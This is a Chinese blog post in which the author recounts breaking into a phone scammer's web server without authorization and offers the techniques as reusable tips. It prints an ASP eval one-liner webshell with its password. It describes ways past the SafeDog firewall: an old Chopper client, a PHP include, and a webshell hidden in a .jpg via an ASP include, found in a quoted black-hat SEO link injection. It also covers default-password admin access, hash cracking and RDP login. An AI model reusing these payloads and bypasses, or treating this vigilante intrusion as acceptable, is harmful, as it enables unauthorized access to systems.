作者：老树

起因：

有一朋友在网上购买了一台手机，等了十多天也没有收到货，才发现被骗了，于是有了下文。

过程：

头晕晕的，文笔不好，因为服务器关了，图就没了，大家将就着看，不喜欢的勿扰。谢谢！

用wvs扫了一下目录，发现了是ewebeditor，用默认密码admin888进入了后台，拿shell就不说了，样式添加asa拿到了shell，这个简单就不说了。

用菜刀连接不了，上传大马也不行。。。

换了一个过安全狗的一句话，<%Y=request("si")%> <%eval(Y)%> 密码：si

用菜刀还是不能连接，可能是菜刀传递参数的时候，某些函数被杀了，导致不能连接。我们直接在浏览器上打开显示是正常解析一句话的。

想起以前的D盾对国外的shell不敏感，有了思路，记得菜刀进行了几次大的更新，换成以前的老版本菜刀，果断连接上……

结果，安全狗只杀最新的菜刀，如果你用以前的老版本照样可以连接一句话。

如图：

传了大马上去想提权，发现又被安全狗禁止了

在28号的看了一篇“一次以外突破安全狗拿shell”，用两个;x.asp;x.jpg绕过狗，其实这方法新版狗早就不行了，也许LZ运气好，遇到的是没升级的安全狗。

也看了一篇PHP包含文件突破安全狗的，代码如下：

<?php

require_once("dama.txt");

?> 

把你的大马php改成dama.txt

注：require_once() 语句在脚本执行期间包含并运行指定文件。

这方法也被狗杀了。。。

想起了以前服务器有网站中毒，找了很久也没找到木马，用狗，用护卫神都没查到，没办法，就只能一步一步的调试找出木马了，方法是删掉一段代码再运行，看还有没有木马，记得很早以前免杀shell就这样搞的，苦逼。。。

一分为二，发现有一段被杀，看了下代码，非常可疑，代码如下：

<!-- #include file

="images\virtucm.jpg" -->

virtucm.jpg里的内容：

<script language="javascript" type="text/javascript">document.write

("<marquee scrollAmount=1000 width='1' height='5'>");</script>

<div>友情链接：

<a href="http://www.198bet.com/">bet365娱乐场</a>

</div>

<script language="javascript" type="text/javascript">document.write

("</marquee>");</script>

传说中的黑帽SEO，隐蔽性、迷惑性超强。。。

把那段代码随便放到一个asp文件里面，把virtucm.jpg里的内容改成你的大马，突破安全狗。

进入shell，找了下可写目录，上传了一个cmd，发现运行命令没回显，看了下用户的桌面，发现一个txt文件，里面有root的账号密码，马上扫了一下端口，发现只开了80，和3389，不能mysql提权了。

打开远程，看有没有前人留下的shift后门，结果没有

翻了翻目录，没发现可以利用的地方，真操蛋

后来在wscript里运行了一下net user，发现能直接列用户，一看权限是system权限，不知谁把asp.dll提升权限了，直接抓了hash破了管理员密码。

果断用管理员登录远程，结果刚登上去，就被踢下来了，原来那骗子天天关注服务器，难怪我的一句话刚上传没多久，就被狗拒绝了，原来是他加入了黑名单。。

结果：

后来，这骗子发现有人搞他服务器，他就直接把服务器关了，域名也直接停止解析，事情告一段落。

思路很重要，基础别忘了，有时经验可以让自己少走很多路。

就像拿到后台多试试几个默认密码，windows oday提权前先运行systeminfo看下打了什么补丁，不要盲目的拿着oday就上，看看远程有没有前人留下的shift后门，翻一翻system32里面有没有前人留下的记录管理员密码……

还有一句友情提醒，网络有风险，购物请慎重。